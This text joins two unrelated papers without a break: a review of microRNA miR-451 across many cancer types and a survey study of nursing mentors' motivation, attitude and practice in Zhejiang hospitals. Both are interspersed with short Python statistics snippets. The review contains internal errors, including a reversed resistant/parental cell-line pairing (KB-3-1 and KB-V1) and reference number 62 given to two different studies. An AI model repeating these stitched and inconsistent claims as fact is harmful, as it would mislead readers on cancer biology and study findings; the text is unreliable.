Esophageal cancer (EC) is one of the most aggressive tumors in the gastrointestinal system and is the sixth most common cause of cancer mortality. 40 In 2012, Wang et al 41 reported that increased miR-451 expression induced apoptosis and suppressed cell proliferation, invasion, and metastasis by suppressing the PI3K/AKT pathway in EC9706 cells. By screening peripheral blood samples of 78 patients with esophageal cancer and 23 healthy donors, Hui et al 42 found that miR-451 and miR-129 expression levels did not increase significantly over those in normal controls in early-stage esophageal squamous cell cancer (ESCC), but significantly increased at stages III and IV. The relative expression of miR-451 alone allowed diagnosis of EC with a sensitivity of 83% and a specificity of 79%. Zang et al 43 found that decreased miR-429 and miR-451 levels were associated with the occurrence of lymph node metastases as well as the differentiation status and TNM stage in ESCC by using miRNA microarray chip analysis of 53 pairs of primary ESCC tissues and corresponding adjacent normal esophageal tissues. Zang et al 44 reported that miR-451 inhibits the proliferation of EC9706 cells by targeting CDKN2D and MAP3K1.
miR-451 and Urinary System Cancers
Bladder carcinoma is the second leading cause of death by urologic cancer among men and is characterized by multiple lesions with a high recurrence rate. In 2012, Xie et al 45 performed gene-chip screening of 14 invasive and three non-invasive bladder urothelial carcinoma tissue samples as well as four bladder cancer cell lines. They discovered that miR-451 was downregulated in the infiltrating bladder urothelial carcinoma group, suggesting that low expression is associated with infiltration and metastasis of bladder urothelial carcinoma. Another group found that miR-451 was significantly downregulated in bladder cancer tissues compared with paracancerous tissues, and miR-451 expression was significantly associated with the degree of histological differentiation and TNM stage. 46 miR-451 expression maintains bladder tumor cells in an epithelial phenotype and inhibits EMT, thereby reducing their invasion and migration. Wang et al 47 also showed that miR-451 was significantly downregulated in bladder cancer tissues compared with adjacent noncancerous bladder tissues and suggested that miR-451 is a tumor suppressor that regulates the migration and invasion of bladder cancer cells by directly targeting c-Myc.
Renal-cell carcinoma (RCC) is the most common cancer of the adult kidney, the incidence and mortality rates of which have increased by 2-3% per decade over the past 20 years. In 2010, Heinzelmann et al 48 performed RT-PCR analysis of miRNA expression in 30 human RCC tissues, including 10 non-metastatic tumors, four tumors of patients with metastasis three years after diagnosis or later, and four tumors of patients with primary metastasis. They identified 12 miRNAs that were strongly downregulated in metastatic RCC, including miR-451. These findings prompted further research on the role of miR-451 in metastatic RCC. It was found to be downregulated in RCC tissues and cell lines, and miR-451 downregulation was correlated with a lower survival rate of patients with RCC. 49 Upregulation of miR-451 expression inhibited the growth of RCC cells and induced apoptosis by targeting its downstream gene, PSMB8. 49
miR-451 and Female Reproductive System Cancers
Ovarian cancer (OC) is the most lethal gynecologic malignancy in the world. 50 In 2014, Ling et al 51 analyzed 115 epithelial OC and 34 normal ovarian tissues and showed that miR-451 was downregulated in epithelial OC. Low levels of miR-451 were associated with advanced FIGO stage, high serum CA-125 levels, and LN metastasis, and miR-451 independently predicted poor prognosis for patients with epithelial OC. A study of nineteen paired cases of OC and endometriosis foci revealed that the expression levels of miR-1, miR-133a, and miR-451 were significantly reduced in ovarian tumors. 52 Cervical cancer is the fourth-leading cause of cancer deaths in women worldwide. In 2008, Martinez et al 53 reported that miR-451 expression was lower in cell lines containing human papilloma virus-16 and/or −18 DNA than in normal cervical cells. miR-451 expression was higher in the multidrug resistant (MDR) human cervical cancer cell line KB-3-1 than in its parental cell line KB-V1, and miR-451 antagomirs decreased P-glycoprotein expression and increased doxorubicin sensitivity in MDR cancer cells. 54 In 2018, Yang et al 55 reported that miR-451 is differentially expressed in different stages of cervical squamous cell carcinoma.
miR-451 and Endocrine Cancers
Breast cancer (BC) is one of the most common malignancies among women, and its incidence is increasing. 56 Early detection is essential for effective treatment and survival. Despite recent advances in early diagnostic methods, metastasis remains the leading cause of death in patients with BC. The current treatment regimen for BC is multimodal, including surgery, chemotherapy, radiotherapy, hormonal treatment, and targeted therapy. Wang et al 57 analyzed 73 invasive, ductal BC tissue samples with or without LN metastasis and found that miR-451 was upregulated in the LN metastasis group. Al-Khanbashi et al 58 analyzed 72 tissue samples and 108 serum samples from 9 and 27 patients with BC, respectively, and showed that tissue miR-451 was upregulated and significantly associated with the pathological stage. They also found that serum miR-451 levels significantly decreased during treatment, and higher serum levels were associated with improved clinical and pathological responses and diseasefree survival. In 2019, Shao et al 59 analyzed plasma samples from 143 patients with BC receiving solo or combination docetaxel chemotherapy and found that miR-451 expression was significantly higher in the sensitive group (partial response and stable disease) than in the resistant group.
Thyroid cancer is the most common human endocrine malignancy, accounting for 95% of all endocrine tumors. In 2013, Wang et al 60 conducted a miRNA microarray analysis of samples from patients with papillary thyroid cancer with/without LN metastasis and showed that miR-451 was upregulated in the LN group. In addition, miR-2861 and miR-451 levels were significantly greater in lateral than in central LN metastases. They also revealed that miR-2861 and miR-451 are unique miRNAs associated with the prognosis and progression of thyroid cancer.
Pancreatic carcinoma is typically asymptomatic at early stages, and the disease becomes apparent only at an advanced stage, with extensive local tumor invasion to surrounding tissues or distant organs. In 2012, Ali et al 16 found that miR-451 was significantly elevated in pancreatic carcinoma tissues. A study by Guo et al 17 indicated that miR-451 was significantly overexpressed in pancreatic cancer tissues and cell lines, and elevated miR-451 expression was associated with improved cell viability both in vitro and in vivo. Further, these authors showed that in pancreatic cancer, a high level of miR-451 is closely linked to poor prognosis and lymphatic metastasis, and miR-451 acts by directly targeting CAB39.
miR-451 and Head and Neck Cancer
Nasopharyngeal carcinoma is a common head and neck cancer derived from the epithelium of the nasopharynx. Liu et al 61 found that miR-451 was significantly downregulated in nasopharyngeal carcinoma cell lines and clinical tissues. Patients with low miR-451 expression had poorer overall survival and disease-free survival than patients with high expression, indicating that miR-451 is an independent prognostic factor in nasopharyngeal carcinoma. In 2010, Hui et al 62 first identified miR-451 as the only significantly overexpressed miRNA (by 4.7-fold) in non-relapsed compared with relapsed patients with locally advanced head and neck squamous cell carcinoma.
Glioblastoma multiforme is the most common primary neoplasm of the central nervous system diagnosed at WHO grade IV and has the highest malignancy and mortality rates even with the current standard treatment. Multiple studies have supported the role of miR-451 in the regulation of glioblastoma multiforme via different pathways. Nan et al 63 reported that miR-451 was downregulated in the human glioblastoma cells A172, LN229, and U251 and that renewed expression of miR-451 had dramatic effects on the three cell lines, inhibiting cell growth, inducing G0/G1 phase arrest, and increasing cell apoptosis, perhaps via regulation of the PI3K/AKT signaling pathway. Godlewski et al 64 found that the miR-451 level decreased in low glucose conditions, slowing proliferation, but enhancing migration and survival in glioblastoma cell lines by regulating its downstream target CAB39, which can bind LKB1, a marker in the LKB1/ AMPK pathway. In glioblastoma patients, elevated miR-451 is associated with shorter survival. As a regulator of the LKB1/AMPK pathway, it may crucially contribute to cellular adaptation in response to altered energy availability. 64 In 2017, Zhao et al 65 also noted that miR-451 expression was lower in glioma than in control brain tissues, especially in the central parts of the tumor. They found that decreased miR-451 expression suppressed tumor cell proliferation but enhanced migration, which was accompanied by low-level CAB39/AMPK/mTOR pathway activation and strong Rac1/cofilin pathway activation, in glioma cell lines.
miR-451 and Osteosarcoma
Osteosarcoma (OS) is the most common primary bone tumor in adolescents and young adults and is associated with a poor prognosis owing to its high malignant and metastatic potential. In 2012, Namløs et al 66 profiled microRNA expression in OS. In addition to the above-mentioned cancers, miR-451 has been reported to be dysregulated in other cancer types. miR-451 expression in solid tumors and the pathways it is involved in are summarized in Table 1 and Figure 1.
miR-451 in Cancer Diagnosis
Biomarkers are biological indicators that can be used for early detection, to define tumor subtypes, or to predict disease outcome. A desirable biomarker requires a certain sensitivity and specificity. It should also be easily accessible, so that it can be detected in samples obtained noninvasively, such as blood, saliva, and/or urine. 74 The abnormal miR-451 expression observed in various cancer types indicates its potential as a novel cancer biomarker (Table 2).
Zhu et al 75 identified five miRNAs (miR-16, miR-25, miR-92a, miR-451, and miR-486-5p) that showed consistently elevated levels in the plasma of patients with GC and provided high diagnostic accuracy for early-stage noncardia gastric adenocarcinoma. In 2012, Konishi et al 76 screened the plasma of pre- and post-operative patients with GC and found that nine miRNAs were significantly reduced in post-operative patients. In validation experiments, miR-451 and miR-486 were found to be decreased in post-operative plasma in 90% and 93% of patients, respectively, suggesting that they could be useful as blood-based biomarkers to screen for GC. Brenner et al 77 identified miR-451, miR-199a-3p, and miR-195 as predictive biomarkers for GC recurrence; miR-451 had the strongest prognostic effect. Redova et al 78 reported that the combination of serum miR-378 and miR-451 could distinguish patients with renal cell carcinoma from healthy controls. Shivapurkar et al 86 analyzed the expression of circulating miRNAs in the sera of patients with CRC diagnosed at an early stage before surgery. Six miRNAs (miR-15a, miR-103, miR-148a, miR-320a, miR-451, and miR-596) could be used to predict the risk of recurrence in early CRC. Phua et al 87 found that fecal miR-451 had a sensitivity of 88% and specificity of 100% in detecting CRC.
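Sensitivity and specificity figures such as the 88%/100% reported for fecal miR-451 translate into predictive values only once a prevalence is assumed. A short Python sketch illustrates this via Bayes' rule; the 0.5% screening prevalence used here is an illustrative assumption, not a figure from the cited studies:

def predictive_values(sens, spec, prev):
    """Positive/negative predictive value from sensitivity, specificity,
    and disease prevalence, via Bayes' rule."""
    ppv = sens * prev / (sens * prev + (1 - spec) * (1 - prev))
    npv = spec * (1 - prev) / (spec * (1 - prev) + (1 - sens) * prev)
    return ppv, npv

print(predictive_values(sens=0.88, spec=1.00, prev=0.005))
# (1.0, 0.9994): perfect specificity makes every positive a true positive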
Ji et al 88 used RT-PCR to analyze the serum samples of 31 patients with OC, 23 patients with benign ovarian tumors, and eight control subjects and identified four miRNAs (miR-22, miR-93, miR-106b, and miR-451) that could be used to distinguish between samples from patients with OC and those from healthy controls.
These data indicate that the abnormal expression of miR-451 is associated with the cancer disease state and that miR-451 has great clinical potential as a noninvasive diagnostic biomarker for numerous human cancers.
miR-451 in Cancer Therapy
Adjuvant therapy such as chemotherapy or radiotherapy is used before, after, or along with the primary surgery to increase its efficiency and improve disease management. Therapy resistance currently is a major obstacle in oncology.
Recent research has suggested that abnormal miRNA expression is associated with therapy resistance. 89 Numerous preclinical trials have shown that miRNAs can influence the sensitivity of tumors to traditional antitumor therapies by using effective delivery strategies such as chemical modification, viral-based carriers, non-viral carriers, and exosomes. 2 Increasing evidence has demonstrated an important role for miR-451 in the regulation of therapy resistance (Figure 2).
Chemoresistance
In lung cancer, Bian et al 90 showed that upregulation of miR-451 increased the sensitivity of NSCLC cells to cisplatin. Gu et al 94 first investigated the potential influence of miR-451 on drug resistance in BC by using a paclitaxel-resistant BC cell line. They then measured the expression of circulating miR-451 in patients with BC undergoing neoadjuvant chemotherapy and found that the relative expression levels were significantly lower in the neoadjuvant chemotherapy-resistant group than in the sensitive group, and miR-451 expression in these two groups was significantly lower than that in the healthy control group. These results indicate the potential application of circulating miR-451 in predicting resistance to neoadjuvant chemotherapy in BC. Wang et al 62 showed in vitro and in vivo that miR-451 may be an important potential target in paclitaxel-resistant BC and acts through targeting Ywhaz. Pigati and his team 95 found that increased miR-451 and miR-1246 levels in the blood, milk, and ductal fluids indicate the presence of abnormal cells in the mammary gland, and that miR-451 rendered MCF7 cells more sensitive to doxorubicin.
In 2008, Zhu et al 54 first reported that miR-451 can regulate drug resistance mediated by MDR-1/P-glycoprotein in OC and cervical cancer cell lines, and Sun et al 96 explored its role in RCC.

Surprisingly, miR-451 is also related to cell metabolism and can mediate cell energy-consuming models via several targets. Ansari et al 107 found that miR-451 levels in glioblastoma multiforme cancer cells were high in a glucose-rich environment and low in conditions of glucose depletion, and that miR-451 is a potent inhibitor of the AMPK signaling pathway. Zhao et al 65 demonstrated that miR-451 is downregulated in glioma tissues compared to normal brain tissues, especially in the central portions of tumors, indicating that the microenvironment inside the tumor is heterogeneous. Central glioma cells are in a hypoxic-hypoglycemic microenvironment with low miR-451 expression; therefore, tumor cell growth is inhibited and necrosis is apparent. In the peripheral parts of the tumor, the survival of tumor cells is enhanced, and they actively proliferate and infiltrate into the surrounding parenchyma. In glioma cell lines, decreased miR-451 expression suppressed tumor cell proliferation but enhanced migration, concomitant with low-level CAB39/AMPK/mTOR pathway activation and strong Rac1/cofilin pathway activation, respectively. Korabecna et al 108 identified five miRNAs derived from cancer cells, including miR-451, that may together regulate 2304 target genes in macrophages, including those involved in cell apoptosis, gene expression, and protein transportation, which may contribute to carcinogenesis. In 2018, Panigrahi et al 2 showed that miR-451 levels were significantly higher in exosomes from human prostate cancer cells under hypoxic conditions than in those under normoxic conditions. These results suggest the potential of miR-451 as a biomarker that influences the tumor microenvironment in patients with prostate cancer.
Conclusion
In this review, we focused on the functions of miR-451 in the progression of multiple cancer types. miR-451 functions as a tumor suppressor and is downregulated in most cancer types. It can be detected in different sample types, such as cancer tissues, blood, saliva, and urine. miR-451 has been associated with multiple target genes and pathways and functions in both direct and indirect ways; the indirect route, secretion into the tumor microenvironment through exosomes, protects the miRNA from degradation by RNases in the serum and endocytic compartments. miR-451 has potential as a biomarker for cancer diagnosis and prognosis or as a treatment target in combination with established drugs to reduce drug resistance. However, its clinical application still has a long way to go.
Clinical nursing mentors' motivation, attitude, and practice for mentoring and factors associated with them
Objective To investigate the motivation, attitude, and practice toward mentoring and related factors among clinical nursing mentors. Methods This cross-sectional study included clinical nursing mentors from 30 hospitals in Zhejiang Province between August and September 2023. Demographic information, motivation, attitude, and practice were collected through a self-administered questionnaire. Results A total of 495 valid questionnaires were collected, and most of the participants were 30-39 years old (68.7%). Average motivation, attitude, and practice scores were 29 (26, 32) (possible range: 8-40), 87 (82, 94) (possible range: 22-110), and 41 (38, 45) (possible range: 11-55), respectively. Correlation analyses showed that the motivation scores were positively correlated with attitude scores (r = 0.498, P < 0.001) and practice scores (r = 0.408, P = 0.001), while attitude scores were positively correlated with practice scores (r = 0.554, P < 0.001). Multivariate logistic regression showed that intermediate and senior nursing mentors (OR = 0.638, 95% CI: [0.426, 0.956], P = 0.030) and different hospitals (OR = 1.627, 95% CI: [1.054, 2.511], P = 0.028) were independently associated with motivation. The hospital's frequency of psychological care was a significant factor associated with nursing mentoring motivation, attitude, and practice. Participation in training (OR = 2.908, 95% CI: [1.430, 5.913], P = 0.003) and lower frequency of job evaluation in hospital ("Often": OR = 0.416, 95% CI: [0.244, 0.709], P = 0.001 and "Sometimes": OR = 0.346, 95% CI: [0.184, 0.650], P = 0.001) were independently associated with practice. Conclusion Clinical nursing mentors had adequate motivation, a positive attitude, and proactive practice towards mentoring. Clinical nursing mentorship should be enhanced by prioritizing mentor training, fostering a supportive environment with consistent psychological care, and promoting structured mentorship activities. Supplementary Information The online version contains supplementary material available at 10.1186/s12912-024-01757-8.
Background
By assisting nursing students through inquiry and offering guidance and feedback on patient-centered clinical learning, faculty members have a vital role in fostering their development and achievement in extracurricular activities beyond traditional classroom settings [1]. These extracurricular activities serve as a gateway through which faculty can introduce students to various clinical practices, nursing research, educational experiences, and service-related opportunities, including tutoring and committee involvement [2,3]. However, the existing approach to assigning mentoring responsibilities in China predominantly relies on objective criteria, such as qualifications, skills, and organizational considerations, with limited emphasis on the mentor's motivation and willingness, which may inadvertently lead to mentors not fully engaging in their roles, suboptimal mentoring outcomes, and potential nurse attrition concerns [4].
In order to gain a deeper understanding of the mentors' motivation, attitudes, and practices, it is essential to consider various psychological and sociological theories. The Psychological Needs Motivation Theory posits that individual behaviors are typically influenced by intrinsic and extrinsic motivations [4], allowing us to gain insights into how mentors' internal needs impact their willingness to assume mentoring responsibilities. On the other hand, Social Exchange Theory asserts that an individual's social behaviors are shaped by economic and social exchanges [5]. This theory aids in explaining the dynamics of interactions and relationships between mentors and apprentices and how these factors influence the mentor's attitudes and behaviors. The Theory of Planned Behavior focuses on individual decision-making processes and can be applied to analyze the mentor's thought process when making mentoring-related decisions [6]. These psychological and sociological theories have a significant role in comprehensively understanding and elucidating mentors' motivation, attitudes, and practices.
Individual willingness is pivotal for harnessing an individual's subjective initiative and enhancing the quality of mentoring [7,8]. Therefore, a profound understanding of mentors' willingness and its influencing factors is crucial for enhancing the effectiveness of mentoring. This study explored the motivation, attitude, and practice of clinical nursing mentors and the factors associated with these aspects. The ultimate objective was to help organizations establish motivation mechanisms for nursing mentors, which, in turn, could foster their enthusiasm for mentoring, enhance the effectiveness of nurse apprenticeship programs, and provide practical insights for nursing human resource development and the advancement of the nursing profession.
Study design and participants
This cross-sectional survey included clinical nursing mentors from 30 hospitals in Zhejiang Province between August and September 2023. Inclusion criteria were the following: (1) the mandatory qualifications to practice as a nurse; (2) competence in mentoring newly recruited or intern nurses; (3) experience mentoring new nurses/intern nurses; and (4) willing consent to participate in the survey study. Exclusion criteria were the following: (1) submission of incomplete information; (2) selection of identical options for an entire section of the questionnaire; (3) completion of the questionnaire in < 120 s or > 60 min; (4) no experience as a clinical nursing mentor; and (5) instances of duplicate IP data.
The study was approved by the Medical Ethics Committee of Ningbo College of Health Sciences. Before participating, all participants were given detailed information about the study's purpose and content and signed an informed consent form. Emphasis was placed on the confidentiality of their responses, assuring them that their personal data would be securely handled and used exclusively for research purposes. Informed consent was obtained from each participant, ensuring that only those who understood and agreed to these terms were included in the analysis.
Questionnaire introduction
The questionnaire was designed following established guidelines and pertinent literature. Feedback was then solicited from a panel of 10 senior clinical nursing and nursing education experts, holding professional titles ranging from Chief Nursing Officer to Associate Professor and Professor. Their insights were used to refine the questionnaire; these revisions involved improvements to question wording and response options to ensure better alignment with real-world clinical scenarios.
The experts suggested including additional elements to further elucidate the factors affecting mentoring motivation, namely: (1) whether hospitals offered training on teaching skills for mentors, (2) how the hospital evaluated mentoring work, and (3) the impact of mentoring apprentices on the mentor's nursing duties. These recommendations were incorporated to enhance the comprehensiveness and relevance of the questionnaire.
The questionnaire was then piloted in a single small-scale distribution, yielding 48 completed copies and demonstrating robust overall internal consistency, with a Cronbach's α coefficient of 0.904. At the dimension level, the motivation and attitude dimensions showed good internal consistency (Cronbach's α of 0.833 and 0.873, respectively), while that of the practice dimension was moderate (0.616). As a result, no adjustments were made to the questionnaire. The final questionnaire encompassed four dimensions, i.e., demographic information (including education, gender, institutional nature, professional title, and institutional support for mentoring work), motivation, attitude, and practice, totaling 61 questions.
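For readers unfamiliar with the reliability statistic used here, the sketch below shows how Cronbach's α can be computed from pilot-test item responses. It is a minimal illustration, not the authors' analysis code; the item matrix is hypothetical random data standing in for the 48 pilot responses.

```python
import numpy as np

def cronbach_alpha(items: np.ndarray) -> float:
    """Cronbach's alpha for an (n_respondents, n_items) matrix of Likert scores."""
    items = np.asarray(items, dtype=float)
    k = items.shape[1]                          # number of items in the dimension
    item_vars = items.var(axis=0, ddof=1)       # variance of each individual item
    total_var = items.sum(axis=1).var(ddof=1)   # variance of the summed scale
    return (k / (k - 1)) * (1.0 - item_vars.sum() / total_var)

# Hypothetical pilot data: 48 respondents x 8 motivation items on a 1-5 scale.
rng = np.random.default_rng(0)
pilot = rng.integers(1, 6, size=(48, 8))
print(f"Cronbach's alpha = {cronbach_alpha(pilot):.3f}")
```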
In response to expert feedback, modifications were made to enhance the clarity and precision of the questionnaire. First, terms such as 'newcomer', 'new nurse', and 'apprentice' were standardized to 'new nurse/intern nurse' throughout the questionnaire, ensuring consistency and clarity. Second, certain question stems were rephrased for better accuracy. For example, the phrase 'the extent of the hospital's psychological care for mentoring nurses' was altered to 'the frequency of the hospital's psychological care for mentoring nurses', providing a more direct measure of the hospital's support in this area. Additionally, a clear definition of a 'nursing mentor' was introduced at the beginning of the questionnaire to screen participants accurately; participants were asked to confirm whether they currently serve or have previously served as clinical nursing mentors. Furthermore, two open-ended questions were added to gain deeper insight into the mentors' perspectives. These questions concerned the mentors' comprehensive evaluation of their apprentices, specifically asking which aspects they deemed most and least important: practical skills, communication skills, work attitude, learning ability, or innovative spirit. These additions aimed to explore the priorities and values of mentors in their mentorship roles, offering a nuanced understanding of their approach to mentorship.
The motivation dimension comprised 8 questions, each evaluated on a five-point Likert scale ranging from strongly disagree (1) to strongly agree (5), giving a score range of 8–40. The attitude dimension consisted of 22 questions on the same five-point scale, yielding a score range of 22–110. The practice dimension featured 11 questions, evaluated on a five-point Likert scale with response options ranging from always (5) to never (1) and scores ranging from 11 to 55. Notably, three practice questions were open-ended and not assigned numerical scores. Scores > 70% of the maximum in each section indicated adequate motivation, a positive attitude, and proactive practice, respectively [9].
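As a concrete illustration of this scoring rule, the following sketch sums the Likert items for a dimension and applies the 70%-of-maximum criterion. The dimension sizes mirror those in the text, but the respondent's answers are made up for the example.

```python
# Score ranges from the questionnaire: (n_items, min_score, max_score)
DIMENSIONS = {
    "motivation": (8, 8, 40),
    "attitude": (22, 22, 110),
    "practice": (11, 11, 55),
}

def classify(dimension: str, item_scores: list[int]) -> tuple[int, bool]:
    """Sum the Likert items and flag whether the total exceeds 70% of the maximum."""
    n_items, lo, hi = DIMENSIONS[dimension]
    assert len(item_scores) == n_items and all(1 <= s <= 5 for s in item_scores)
    total = sum(item_scores)
    return total, total > 0.7 * hi

# Hypothetical respondent whose motivation score equals the cohort median of 29.
total, adequate = classify("motivation", [4, 4, 3, 4, 4, 3, 4, 3])
print(total, adequate)   # 29, True (29 > 28, i.e. 70% of 40)
```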
Analysis of the formal survey data revealed strong internal consistency, with a Cronbach's α coefficient of 0.883 and a Kaiser-Meyer-Olkin (KMO) value of 0.918, confirming the reliability and suitability of the questionnaire for this study.
The sample size for our study was calculated using a standard statistical formula. With a confidence level of 95% (z = 1.96), an estimated proportion (p) of 0.5, and a margin of error (e) of 0.05, the formula n = z² × p × (1 − p) / e² yielded a sample size of approximately 384 [10]. However, to account for potentially unusable responses, a non-response rate of 10% was assumed, and we aimed to collect > 500 questionnaires. This study employed a convenience sampling approach to select 30 hospitals in 8 cities within Zhejiang Province. The hospitals were chosen based on their qualification for clinical internship mentoring and a minimum classification at the secondary level. The distribution of questionnaires to clinical nursing mentors within these hospitals was facilitated through each hospital's nursing department clinical practice management personnel, using the WeChat platform. There was an estimated pool of approximately 5,000 internship mentors among the selected hospitals. The allocation of questionnaires was proportional to the number of hospital beds: hospitals with < 1,000 beds received approximately 5–10 questionnaires, those with 1,000–2,000 beds were assigned 10–20 questionnaires, and hospitals with > 2,000 beds received 20–50 questionnaires. A total of 643 questionnaires were distributed, with 25 individuals declining to participate, resulting in 618 collected questionnaires. After excluding 37 questionnaires with a completion time of < 120 s or > 3,600 s, 82 questionnaires completed by individuals who had never served as clinical nursing mentors, and 4 questionnaires with repeated IP addresses, a total of 495 valid questionnaires were included in the statistical analysis.
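The sample-size arithmetic can be reproduced directly; this is a brief check of the formula quoted above, with the 10% non-response inflation applied afterwards (the authors then rounded their target up to > 500).

```python
import math

z, p, e = 1.96, 0.5, 0.05
n = z**2 * p * (1 - p) / e**2          # 3.8416 * 0.25 / 0.0025 = 384.16
n_target = math.ceil(n / (1 - 0.10))   # inflate for an assumed 10% non-response
print(round(n), n_target)              # 384, 427
```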
Statistical analysis
Statistical analysis was conducted using SPSS 23. The respondents' demographic information and their scores across the dimensions were subjected to descriptive analysis; the median, 25th percentile, and 75th percentile were used to present these data, and count data were represented as N (%). To compare dimension scores among survey participants with varying demographic characteristics, the Wilcoxon-Mann-Whitney test was employed for comparisons between two groups, and the Kruskal-Wallis test was used for continuous variables across three or more groups. The Spearman correlation coefficient was applied to analyze the correlations between scores on the different dimensions. In both univariate and multivariate regression analyses, dimension scores were used as dependent variables to analyze their relationship with demographic data; in the multivariate analysis, the median score was used as the cut-off value to dichotomize each dimension score. A stepwise approach was adopted for selecting model variables, with variables at a significance level of P < 0.1 in univariate analysis initially included. P-values were reported to three decimal places, with P < 0.05 representing statistical significance.
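A hedged sketch of this analysis pipeline, using SciPy and statsmodels rather than SPSS, is shown below. The variable names and simulated data are illustrative only; the point is the sequence of steps: a Spearman correlation, a two-group Mann-Whitney comparison, and a logistic regression on the median-split outcome whose exponentiated coefficients correspond to the odds ratios reported in the paper's tables.

```python
import numpy as np
import pandas as pd
from scipy import stats
import statsmodels.api as sm

rng = np.random.default_rng(1)
df = pd.DataFrame({
    "motivation": rng.integers(8, 41, 495),
    "attitude": rng.integers(22, 111, 495),
    "trained": rng.integers(0, 2, 495),     # 1 = participated in mentor training
})

# Spearman correlation between two dimension scores
rho, p_spearman = stats.spearmanr(df["motivation"], df["attitude"])

# Wilcoxon-Mann-Whitney test between two demographic groups
g0 = df.loc[df["trained"] == 0, "motivation"]
g1 = df.loc[df["trained"] == 1, "motivation"]
u, p_mw = stats.mannwhitneyu(g0, g1)

# Logistic regression with the median split as the binary outcome
df["high_motivation"] = (df["motivation"] > df["motivation"].median()).astype(int)
model = sm.Logit(df["high_motivation"],
                 sm.add_constant(df[["trained", "attitude"]])).fit(disp=0)
odds_ratios = np.exp(model.params)          # exponentiated coefficients = ORs
print(rho, p_mw, odds_ratios)
```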
Results
The general characteristics of the participants

A total of 495 valid questionnaires were collected. Among the respondents, most were 30–39 years old (68.7%); 98% were female, 92.9% had undergraduate or higher educational levels, and 68.1% held intermediate or senior professional titles. Participants had varying years of nursing experience, with the majority (66.7%) falling within the 6–15 year range. In addition, 65% had served as nursing supervisors for 3–10 years, and over half of the nursing mentors had guided more than 11 apprentices. Also, 74.3% came from Tertiary A hospitals, 84.8% became nursing mentors through organizational arrangements, and 81.4% had undergone training related to mentoring (Table 1).
Motivation, attitude, and practice scores and distribution across different populations
The study population had a median motivation score of 29/40 (IQR 26–32), a median attitude score of 87/110 (IQR 82–94), and a median practice score of 41/55 (IQR 38–45). Nursing mentors with a primary professional title had significantly higher motivation scores than those with intermediate or advanced professional titles (P = 0.035). Significant differences in attitude scores were observed among nursing mentors with varying years of nursing experience, years of nursing supervision, and numbers of apprentices guided (P < 0.05). Differences in motivation scores were statistically significant among nursing mentors based on the pathways by which they became mentors (P = 0.033). Participation in training and the frequency of hospitals providing compensation subsidies to nursing mentors significantly differed among groups with regard to mentoring motivation, attitude, and practice (P < 0.01). The level of financial support from hospitals for nursing mentoring, the frequency of psychological care provided by hospitals to nursing mentors, and the frequency with which hospitals were aware of mentoring issues were all associated with significant differences in mentoring motivation, attitude, and practice scores (P < 0.001) (Table 1).
In terms of their motivation for mentoring, a considerable 37.8% expressed uncertainty regarding whether it was driven by aspirations for professional advancement (M1). Interestingly, 64.6% strongly disagreed or disagreed with the idea that it was primarily for financial gain (M2). A notable 36.6% indicated that their mentoring involvement was spurred by organizational assignments (M3). A significant 86.7% perceived new nurses/interns not merely as apprentices but as collaborative working partners (M4). An overwhelming 95.5% affirmed that their motivation was rooted in facilitating the swift competence development of newcomers in the nursing field (M5). Furthermore, 62% were motivated by a desire to delve into the intricacies of nursing workforce development (M6). A striking 90.3% named their commitment to preserving the essence of nursing professionalism as a pivotal motivation (M7). Moreover, 83.5% expressed an intention to instill a passion for the profession in the novices (M8) (Table 2).
The participants displayed diverse attitudes, with 43.6% either not perceiving or being uncertain about the personal benefits of mentoring new nurses/interns (A2). Interestingly, 19% viewed mentoring as time-consuming (A3), and an equal proportion found reporting and recording procedures cumbersome, which somewhat diminished their enthusiasm for mentoring (A4). On a positive note, 57.2% believed that mentoring could alleviate their workload through the contributions of newcomers (A5). Additionally, 89.5% and 94%, respectively, derived happiness (A13) and a sense of being valued (A14) from the growth of their mentees. Impressively, 96.7% expressed a keen interest in sharing their accumulated experiences and lessons with the younger generations (A19), and another significant majority, 95.5%, displayed genuine concern for new nurses/interns, drawing from their own past experiences (A20) (Table 3).
Regarding practice, 87.0% of respondents consistently or frequently adapted their mentoring approaches to the distinct personalities of new nurses/interns (P1). Furthermore, 82.6% affirmed that the mentoring process compelled them to continually enhance their nursing knowledge and overall competence to varying degrees (P5), and 33.9% never contemplated giving up (P6). Notably, 42.0% never selected mentees based on personal preferences (P7), and 43.2% maintained patience even in the face of repeated poor performance by a newcomer (P8). Significantly, 73.8% advocated exposing newcomers to a higher frequency of clinical practice (P10). A noteworthy 48.1% reported encountering conflicts between their mentoring responsibilities and clinical duties (P11). In the overall evaluation of mentored new nurses/interns, 57.4% regarded work attitude as the most crucial factor (P13), whereas 67.3% deemed a creative spirit the least essential (P14) (Table 4).
Correlation analysis of motivation, attitude, and practice
Correlation analyses showed that motivation scores were positively correlated with attitude scores (r = 0.498, P < 0.001) and practice scores (r = 0.408, P = 0.001), and attitude scores were also positively correlated with practice scores (r = 0.554, P < 0.001) (Table 5). The frequency of psychological care provided by the hospital emerged as a significant factor associated with nursing mentoring motivation, attitude, and practice: the more frequently nursing mentors received psychological care from their hospital, the higher their probability of a high score. Compared to nursing mentors who did not participate in training, those who participated had a higher probability of high practice scores (OR = 2.908, 95% CI: 1.430–5.913, P = 0.003). Compared with the highest frequency of job evaluation in hospitals, lower frequencies were associated with a lower probability of high practice scores ("Often": OR = 0.416, 95% CI: 0.244–0.709, P = 0.001; "Sometimes": OR = 0.346, 95% CI: 0.184–0.650, P = 0.001) (Table 6).
Discussion
The present study, conducted at multiple centers in Zhejiang Province, in China's economically advanced eastern coastal region, revealed that clinical nursing mentors had adequate motivation, a positive attitude, and proactive practice towards mentoring. Our findings emphasize the importance of enhancing clinical nursing mentorship: by prioritizing mentor training, fostering a supportive environment with consistent psychological care, and promoting structured mentorship activities, nursing mentors' motivation, attitude, and practice could be significantly improved.
Our results showed that clinical nursing mentors had generally positive motivation, attitude, and practice levels, consistent with a previous study that found clinical mentors to have high levels of motivation and a positive attitude towards their mentees, fostering a supportive mentorship environment [11]. Several factors were found to influence the motivation, attitude, and practice of nursing mentors, including the mentor's professional title, years of experience, the number of apprentices they guide, and how they became mentors. Additionally, participation in training, compensation subsidies from hospitals, financial support, psychological care, and hospitals' awareness of mentoring issues all shaped mentors' motivation, attitude, and practice. Our findings are consistent with previous studies emphasizing the importance of institutional support and mentor training programs in improving mentorship quality [12,13].
